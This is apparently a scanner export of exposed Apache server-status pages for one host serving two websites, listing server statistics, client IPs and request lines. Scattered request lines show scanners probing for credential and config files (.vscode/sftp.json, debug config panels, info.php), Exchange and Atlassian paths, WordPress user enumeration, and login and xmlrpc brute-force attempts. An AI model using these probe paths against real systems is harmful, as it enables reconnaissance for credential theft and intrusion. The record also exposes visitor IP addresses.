1-5733257950/217/121207_ 58.62123249192802780.01.782385.39 200.29.216.37h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5733257950/332/121434_ 58.631230227646620.03.052486.32 200.29.216.37h2tandemsl.com:443idle, streams: 0/52/52/0/0 (open/recv/resp/push/rst) 1-5733257950/262/121099_ 58.6412650189864900.03.652351.94 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5733257950/240/122501_ 58.591470191351550.03.262459.95 200.29.216.37h2tandemsl.com:443done, streams: 0/57/57/0/0 (open/recv/resp/push/rst) 1-5733257950/223/122821_ 58.63920230222120.02.572527.47 200.29.216.37h2tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-5733257940/919/138711_ 71.864420222672160.013.902769.03 136.226.214.166h2relehse.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 2-5733257940/837/140793_ 71.494121223038020.011.002792.71 200.68.141.12h2done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 2-5733257940/855/137669_ 71.7960240946390.09.412821.83 200.29.216.37h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5733257940/859/138227_ 71.466220241209670.010.742634.54 194.224.78.190h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5733257940/907/139683_ 71.864469206844840.011.232750.69 136.226.214.166h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5733257940/778/139590_ 71.909454228946580.011.582674.72 103.133.110.50http/1.1tandemsl.com:443GET /en/hse-engineering/water-treatment-plant-improvements/ HTT 2-5733257940/756/137286_ 71.874439188578460.07.712667.68 136.226.214.166h2relehse.com:443idle, streams: 0/5/5/0/0 (open/recv/resp/push/rst) 2-5733257940/687/138437_ 71.51724200425010.014.362861.06 159.223.50.175h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-5733257940/717/137424_ 71.814195225053910.012.442794.13 136.226.214.166h2relehse.com:443done, streams: 0/5/5/0/0 (open/recv/resp/push/rst) 2-5733257940/780/135661_ 71.8910253192890580.024.262899.37 103.133.110.50http/1.1tandemsl.com:443HEAD /en/hse-engineering/water-treatment-plant-improvements/ HT 3-5733257920/2424/133080_ 113.3620206371600.049.302518.02 159.223.50.175http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-5733257920/2579/132949_ 113.2510203469170.045.852528.51 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5733257920/2731/134402_ 113.3501189000170.044.872670.41 159.223.50.175http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5733257920/2321/133299_ 113.3610207563340.044.572534.54 159.223.50.175http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-5733257920/2730/132138_ 113.30236295658010.040.902611.90 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5733257921/2700/133322K 113.36001932278215.545.432570.25 200.188.7.18h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5733257920/2542/131324_ 113.3630202134460.048.482602.87 159.223.50.175http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-5733257920/2528/132929_ 113.1500258169160.032.942539.05 159.223.50.175http/1.1 3-5733257920/2349/132465_ 113.3600235994980.055.632656.99 159.223.50.175http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-5733257920/2623/135300_ 113.25035208007160.056.602609.37 180.109.246.192http/1.1 4-5733257930/494/128269_ 68.563422181851610.07.252328.26 136.226.214.166h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5733257930/384/127123_ 68.26310212708660.09.302305.74 5.2.24.14h2tandemsl.com:443done, streams: 0/54/54/0/0 (open/recv/resp/push/rst) 4-5733257930/425/130126_ 68.49710183471120.013.932394.00 62.175.36.155h2tandemsl.com:443idle, streams: 0/46/46/0/0 (open/recv/resp/push/rst) 4-5733257930/314/127635_ 68.49711190777260.04.992338.68 62.175.36.155h2tandemsl.com:443idle, streams: 0/45/45/0/0 (open/recv/resp/push/rst) 4-5733257930/418/130539_ 68.49310181740700.07.832342.49 62.175.36.155h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst)
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a8580288d07b5c
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Saturday, 06-May-2023 22:41:04 CEST Restart Time: Saturday, 07-Jan-2023 18:56:40 CET Parent Server Config. Generation: 57 Parent Server MPM Generation: 56 Server uptime: 119 days 2 hours 44 minutes 24 seconds Server load: 0.09 0.11 0.06 Total accesses: 6374614 - Total Traffic: 120.6 GB - Total Duration: 1056602703 CPU Usage: u633.26 s693.93 cu20411.5 cs13676.5 - .344% CPU load .619 requests/sec - 12.3 kB/second - 19.8 kB/request - 165.752 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03265438no1yes010000 13289619no0yes19000 23167061no0yes19000 33086907no0yes010000 43149579no0yes010000 Sum501 248000 _____________W_______W____________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-5632654380/751/122405_ 46.9760192172059750.013.632166.91 98.166.167.75http/1.1tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5632654380/868/120322_ 47.071311176809610.016.342285.17 139.144.150.8http/1.1 0-5632654380/913/120882_ 47.080197203782230.015.202298.26 139.144.150.8h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-5632654380/738/118061_ 47.1751230170502670.018.542307.78 47.90.137.113http/1.1tandemsl.com:443POST /xmlrpc.php HTTP/1.1 0-5632654380/776/118394_ 47.2000261842170.09.252256.69 139.144.150.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-5632654380/768/118074_ 47.1051222157237360.013.562199.36 51.178.207.154h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5632654380/770/120346_ 47.141279183807480.019.522214.83 98.166.167.75http/1.1tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-5632654380/943/122192_ 47.170211183120680.024.772332.52 98.166.167.75http/1.1tandemsl.com:443POST /xmlrpc.php HTTP/1.1 0-5632654380/800/119942_ 47.2100366459120.014.912249.03 139.144.150.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-5632654380/655/117642_ 47.080185195089090.011.142213.87 205.210.31.58http/1.1 1-5632896190/436/120322_ 22.5211312300860.09.272472.06 139.144.150.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-5632896190/387/120700_ 22.4210274234470.011.712396.87 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1683405447.48347306251525878906 1-5632896190/375/120539_ 22.5301225187970.04.382557.12 139.144.150.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-5632896190/310/119691W 22.4900209730810.07.862450.88 139.144.150.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-5632896190/454/119924_ 22.490262163544520.07.822559.79 66.249.73.230http/1.1tandemsl.com:443GET /seguridad-industrial-blog/metodo- HTTP/1.1 1-5632896190/358/120639_ 22.3256312192074550.04.572379.13 66.249.73.234http/1.1tandemsl.com:443GET /wp-content/uploads/2020/03/Nota-informativa-Exportacio%CC% 1-5632896190/311/120862_ 22.4957277227022770.04.792480.26 98.166.167.75http/1.1tandemsl.com:443POST /xmlrpc.php HTTP/1.1 1-5632896190/367/120553_ 22.46571189337900.07.712341.43 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1683405542.33891892433166503906 1-5632896190/358/121974_ 22.5300190765550.07.302452.90 139.144.150.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-5632896190/374/122224_ 22.4900229388870.09.862518.49 139.144.150.8http/1.1 2-5631670610/2627/137680_ 168.0910221922130.060.372754.25 139.144.150.8http/1.1 2-5631670610/2943/139923W 168.0600222092340.052.662781.16 98.166.167.75http/1.1tandemsl.com:443POST /xmlrpc.php HTTP/1.1 2-5631670610/3600/136785_ 168.3100240043640.054.652811.62 139.144.150.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-5631670610/3332/137323_ 168.093410240387430.059.162623.60 187.136.5.120h2tandemsl.com:443idle, streams: 0/28/28/0/0 (open/recv/resp/push/rst) 2-5631670610/3634/138722_ 168.076020205888690.061.332739.00 187.136.5.120h2tandemsl.com:443idle, streams: 0/19/19/0/0 (open/recv/resp/push/rst) 2-5631670610/3108/138771_ 168.075490227851760.048.192659.78 187.136.5.120h2tandemsl.com:443idle, streams: 0/21/21/0/0 (open/recv/resp/push/rst) 2-5631670610/3187/136460_ 168.11544158187396560.052.472658.88 65.108.127.181http/1.1tandemsl.com:443POST /xmlrpc.php HTTP/1.1 2-5631670610/3293/137701_ 168.085441199296770.064.852846.29 187.136.5.120h2tandemsl.com:443idle, streams: 0/25/25/0/0 (open/recv/resp/push/rst) 2-5631670610/3423/136666_ 168.183411224209600.059.092781.30 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1683405323.36134004592895507812 2-5631670610/2934/134836_ 168.075570191703110.059.942874.77 187.136.5.120h2tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-5630869070/1725/130615_ 195.1300203949960.025.282468.45 139.144.150.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-5630869070/2019/130359_ 194.4216881144200687950.041.612482.61 40.88.21.235http/1.1tandemsl.com:443GET / HTTP/1.1 3-5630869070/1945/131665_ 194.475434186442120.040.422625.52 147.78.47.249http/1.1tandemsl.com:443GET /wp-includes/wlwmanifest.xml HTTP/1.1 3-5630869070/2066/130947_ 195.0950361204911700.038.552486.76 5.45.80.13http/1.1tandemsl.com:443GET /wp-includes/stats.php?s7=1 HTTP/1.1 3-5630869070/1946/129395_ 194.405431292595740.037.992570.88 187.161.27.213http/1.1tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-5630869070/2026/130615_ 190.386030191031600.040.752524.77 200.62.121.71h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-5630869070/1988/128773_ 194.4316880199426470.036.592554.06 40.88.21.235http/1.1tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-5630869070/1916/130390_ 194.41506255700030.031.782506.08 5.45.80.13http/1.1 3-5630869070/1844/130096_ 192.681688157233255750.039.872600.95 168.119.68.121h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5630869070/1990/132669_ 192.581406205558910.036.752552.73 139.144.150.8h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-5631495790/3798/127761_ 197.671505178181356440.072.322320.84 147.78.47.249http/1.1tandemsl.com:443GET /public/_ignition/health-check/ HTTP/1.1 4-5631495790/3578/126728_ 197.6315110212131790.072.102296.37 157.100.76.46h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-5631495790/3936/129693_ 197.6910183050950.078.532379.70 139.144.150.8h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-5631495790/3547/127307_ 197.6315050190266230.095.172332.99 187.161.27.213http/1.1tandemsl.com:443GET /wp-content/plugins/elementor/assets/lib/dialog/dialog.min. 4-5631495790/3812/130092_ 197.690189181267510.069.282334.42 139.144.150.8h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-5631495790/3688/127915_ 197.6215052175618480.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802e1982b5f
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Friday, 05-May-2023 02:38:13 CEST Restart Time: Saturday, 07-Jan-2023 18:56:40 CET Parent Server Config. Generation: 57 Parent Server MPM Generation: 56 Server uptime: 117 days 6 hours 41 minutes 33 seconds Server load: 0.01 0.02 0.00 Total accesses: 6310740 - Total Traffic: 119.4 GB - Total Duration: 1045180334 CPU Usage: u596.67 s618.69 cu20156.5 cs13525.6 - .344% CPU load .623 requests/sec - 12.4 kB/second - 19.8 kB/request - 165.619 ms/request 7 requests currently being processed, 43 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03086905no0yes37000 13086904no0yes010000 23167061no0yes19000 33086907no0yes010000 43149579no0yes37000 Sum500 743000 R____R__R________________R_______________RWW______ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-5630869050/1146/119661_ 103.6100168158870.014.622116.71 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-5630869050/966/117627_ 103.5926228173211150.012.172232.37 109.171.32.37h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5630869050/1126/118177_ 103.51260199885610.018.942240.36 172.71.230.74http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5630869050/1144/115271_ 103.52460166606680.023.682248.28 5.45.80.13http/1.1 0-5630869050/914/115550_ 103.51220257740260.014.512209.44 120.206.188.198http/1.1 0-5630869050/845/115199R 103.57460152774020.019.042143.95 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1683247047.19352507591247558593 0-5630869050/1037/117591_ 103.5746453173772100.015.822156.86 5.45.80.13http/1.1tandemsl.com:443GET /wp-content/wp-upgrade.php HTTP/1.1 0-5630869050/1084/119251_ 103.5100179103050.026.382269.97 134.122.89.242h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-5630869050/1053/117158R 103.5246225362253820.016.282190.59 181.142.98.127h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5630869050/1057/115099_ 103.6101191661980.020.262166.86 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-5630869040/958/117913_ 99.1122213308011690.012.432421.58 120.206.188.198http/1.1 1-5630869040/900/118224_ 99.1311270260680.018.302338.86 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcHELP 1-5630869040/1163/118445_ 99.11270220774430.022.902522.94 109.171.32.37http/1.1tandemsl.com:80GET /wp-login.php HTTP/1.1 1-5630869040/905/117598_ 98.9523162206103340.013.432393.38 172.69.242.72http/1.1 1-5630869040/873/117415_ 98.4500159983840.022.712499.99 172.70.136.73http/1.1 1-5630869040/945/118374_ 99.102331187899490.016.562339.27 172.69.242.72http/1.1 1-5630869040/985/118222_ 98.77230223249020.016.922427.74 120.206.188.198http/1.1 1-5630869040/789/118248_ 98.45270184812200.023.122289.13 109.171.32.37http/1.1 1-5630869040/935/119652_ 98.92231077185707550.015.082405.19 172.69.242.72http/1.1 1-5630869040/938/119736_ 98.7523201225212420.017.242465.82 172.69.242.72http/1.1 2-5631670610/1942/136995_ 79.850228220525800.044.142738.02 134.122.89.242http/1.1 2-5631670610/2147/139127_ 79.8500220720560.044.052772.55 134.122.89.242http/1.1 2-5631670610/2741/135926_ 79.85880238856540.041.212798.18 172.71.230.74http/1.1 2-5631670610/2628/136619_ 79.85870238993390.041.612606.05 172.71.230.74http/1.1 2-5631670610/2925/138013_ 79.841090204847700.047.502725.17 186.169.51.245h2tandemsl.com:443idle, streams: 0/46/46/0/0 (open/recv/resp/push/rst) 2-5631670610/2202/137865_ 79.9000226437220.030.762642.34 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-5631670610/2428/135701_ 79.8500185800510.036.382642.79 134.122.89.242h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-5631670610/2590/136998_ 79.85950198091470.043.182824.62 172.69.241.70http/1.1 2-5631670610/2558/135801_ 78.8896307223053310.038.272760.49 162.158.59.73http/1.1 2-5631670610/2212/134114_ 79.8200190220480.046.722861.55 134.122.89.242http/1.1 3-5630869070/1505/130395_ 120.67790203166870.022.262465.43 172.70.138.71http/1.1done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-5630869070/1803/130143_ 122.2168309199938180.038.992479.99 172.70.136.73http/1.1 3-5630869070/1731/131451_ 122.6368164185665230.035.802620.90 172.70.136.73http/1.1 3-5630869070/1842/130723_ 122.1778907204265980.032.762480.96 181.142.98.127h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-5630869070/1764/129213_ 120.890243291864350.036.332569.22 134.122.89.242h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-5630869070/1686/130275_ 121.91570190262040.035.192519.21 172.70.202.70http/1.1 3-5630869070/1764/128549_ 120.87230198719080.032.912550.38 120.206.188.198http/1.1 3-5630869070/1678/130152_ 121.590194254925020.027.332501.63 134.122.89.242http/1.1 3-5630869070/1620/129872_ 120.87560232604170.034.652595.73 172.70.202.70http/1.1 3-5630869070/1806/132485_ 121.91670204814980.032.772548.75 172.71.162.69http/1.1 4-5631495790/3549/127512_ 126.0000180784840.069.862318.39 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 4-5631495790/3326/126476_ 126.0001211600090.068.272292.55 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 4-5631495790/3634/129391W 124.9400182620910.074.752375.92 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-5631495790/3311/127071_ 126.0001189867380.092.472330.29 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /info.php HTTP/1.1 4-5631495790/3640/129920_ 123.920182180905070.067.032332.17 134.122.89.242http/1.1 4-5631495790/3406/127633_ 126.0000175185940.055.762431.39 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 4-5631495790/3391/129802_ 126.0000246069070.065.722366.79 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 4-5631495790/3318/128894_ 124.620226168560950.054.882283.08 134.122.89.242h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-5631495790/3770/132117_ 125.0400206335430.075.942381.44 134.122.89.242h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-5631495790/2983/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a858027b3a6e16
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Friday, 14-Apr-2023 12:12:43 CEST Restart Time: Saturday, 07-Jan-2023 18:56:40 CET Parent Server Config. Generation: 45 Parent Server MPM Generation: 44 Server uptime: 96 days 16 hours 16 minutes 3 seconds Server load: 0.00 0.03 0.03 Total accesses: 5120220 - Total Traffic: 99.1 GB - Total Duration: 886339622 CPU Usage: u455 s576.73 cu16401.5 cs11025.3 - .341% CPU load .613 requests/sec - 12.4 kB/second - 20.3 kB/request - 173.106 ms/request 10 requests currently being processed, 40 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01992176no1yes46000 11692066no0yes010000 21968223no0yes19000 31692065no0yes19000 41991665no0yes46000 Sum501 1040000 WR____R__R___________________R___R__________W_KR_R Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-4419921760/515/105675W 15.1800148273830.07.511878.97 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 0-4419921760/570/104495R 15.134362153362550.05.822011.52 178.62.73.12http/1.1 0-4419921760/395/104417_ 15.160170182180830.011.322000.04 178.62.73.12http/1.1 0-4419921760/515/101904_ 15.20052146917040.013.321968.99 178.62.73.12http/1.1 0-4419921760/380/102877_ 15.20044242016070.05.391994.95 178.62.73.12h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-4419921760/392/101931_ 15.0801130168200.08.311899.26 178.62.73.12h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-4419921760/467/104327R 15.2211158507380.06.991951.61 178.62.73.12http/1.1 0-4419921760/643/104934_ 15.1500161112990.09.281985.01 178.62.73.12http/1.1 0-4419921760/416/103784_ 15.2302345955530.05.021953.21 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-4419921760/551/102267R 15.0800174216460.08.731956.97 178.62.73.12http/1.1 1-4416920660/2063/107371_ 206.480529294393350.037.282245.51 216.244.66.197http/1.1tandemsl.com:443GET /seguridad-de-producto-blog/la-base-de-datos-scip/ HTTP/1.1 1-4416920660/1784/107006_ 206.25480256295640.039.402144.92 66.249.76.171http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4416920660/2076/107098_ 206.524854205755120.035.742313.79 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4416920660/1799/106548_ 206.665141190670470.031.612224.54 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4416920660/1841/106260_ 206.55040145622800.029.612306.04 178.62.73.12http/1.1 1-4416920660/1816/106831_ 206.482870173799150.031.312136.63 66.249.66.35http/1.1tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4416920660/1890/107282_ 206.502460208699060.027.722218.81 66.249.66.35http/1.1tandemsl.com:443GET /wp-includes/js/dist/hooks.min.js?ver=4169d3cf8e8d95a3d6d5 1-4416920660/1832/107782_ 206.502469171070990.028.012089.01 66.249.66.35http/1.1tandemsl.com:443GET /wp-content/plugins/elementor/assets/js/frontend-modules.mi 1-4416920660/1822/108567_ 206.572491172447190.030.172206.51 128.14.209.162http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-4416920660/1770/108290_ 206.482870211505150.034.852290.12 66.249.66.35http/1.1tandemsl.com:443GET /wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver= 2-4419682230/924/114845_ 33.13038192218040.012.032323.54 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-4419682230/768/116312_ 33.33950192624780.09.072371.18 80.32.149.34h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-4419682230/824/113965_ 33.35105181206462490.014.192419.90 24.199.86.99http/1.1tandemsl.com:443POST /wp-login.php HTTP/1.1 2-4419682230/832/112606_ 33.3110540184790400.014.402230.84 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-4419682230/969/115168_ 33.19950175591620.012.032347.27 66.249.76.171http/1.1tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-4419682230/827/115146_ 33.3795276195414800.011.642287.72 54.36.148.219h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-4419682230/618/114014_ 33.4200154783570.07.172277.36 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 2-4419682230/797/114282_ 33.1712958165085920.015.662445.72 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-4419682230/680/113334_ 33.4100185925180.011.322388.07 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1681467162.75156307220458984375 2-4419682230/707/111142R 33.3413248160502440.09.782435.70 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4416920650/2143/99940_ 211.052471169553280.026.981944.45 66.249.66.35http/1.1tandemsl.com:443GET /wp-content/plugins/elementor/assets/lib/eicons/css/element 3-4416920650/2034/101842_ 211.07653164291280.041.601997.47 66.249.66.35http/1.1tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4416920650/1989/102115_ 211.172500150339020.033.772073.86 128.14.209.162http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-4416920650/1839/100068R 211.113712170148550.023.401969.99 178.62.73.12http/1.1 3-4416920650/1807/99236_ 211.093691257101900.030.312034.49 66.249.66.35http/1.1 3-4416920650/1878/100626_ 211.11450155774030.029.861989.96 66.249.76.70http/1.1 3-4416920650/1956/98627_ 211.06247564157005420.031.222061.59 66.249.66.35http/1.1tandemsl.com:443GET /medioambiente-blog/analisis-de-riesgo-medioambiental-arma/ 3-4416920650/2088/99789_ 211.2947180217494220.032.601963.93 66.249.76.70http/1.1tandemsl.com:443GET /wp-content/uploads/2019/09/Compresed-v1.mp4 HTTP/1.1 3-4416920650/2193/99894_ 211.26661190555580.030.062078.43 3.211.110.80http/1.1tandemsl.com:443GET /wp-content/uploads/2019/12/Dise%c3%b1o-sin-t%c3%adtulo-6-1 3-4416920650/1980/101031_ 211.1102171567710.038.171981.79 178.62.73.12h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-4419916650/499/85369_ 14.6836991128093890.09.851589.70 66.249.76.174http/1.1tandemsl.com:443GET / HTTP/1.1 4-4419916650/514/85312_ 14.68042158325580.05.841563.40 178.62.73.12h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-4419916650/396/87135_ 14.7404126713940.05.721607.59 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /info.php HTTP/1.1 4-4419916650/534/85565_ 14.713958131552470.08.781562.61 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-4419916650/331/87310W 14.6100129822470.06.521586.22 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-4419916650/551/85368_ 14.623647121460830.011.201655.20 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-4419916651/328
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802effe1271
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Thursday, 02-Mar-2023 00:09:34 CET Restart Time: Saturday, 07-Jan-2023 18:56:40 CET Parent Server Config. Generation: 27 Parent Server MPM Generation: 26 Server uptime: 53 days 5 hours 12 minutes 53 seconds Server load: 0.08 0.03 0.01 Total accesses: 2995675 - Total Traffic: 55.5 GB - Total Duration: 514444816 CPU Usage: u340.36 s365.83 cu9371.4 cs6170.02 - .353% CPU load .652 requests/sec - 12.6 kB/second - 19.4 kB/request - 171.729 ms/request 8 requests currently being processed, 42 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03270329no0yes010000 13542855no1yes19000 23540182no0yes19000 33557531no0yes46000 43270327no0yes28000 Sum501 842000 ______________R______R__________R____RRW__WR______ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2632703290/1585/61350_ 172.080083612180.019.491106.55 134.122.63.192http/1.1 0-2632703290/1464/60612_ 172.061203074041240.026.151151.82 181.115.167.50h2tandemsl.com:443idle, streams: 0/45/45/0/0 (open/recv/resp/push/rst) 0-2632703290/1464/60175_ 172.08020587602810.032.501134.61 134.122.63.192h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-2632703290/1378/58790_ 172.600273756740.020.591146.42 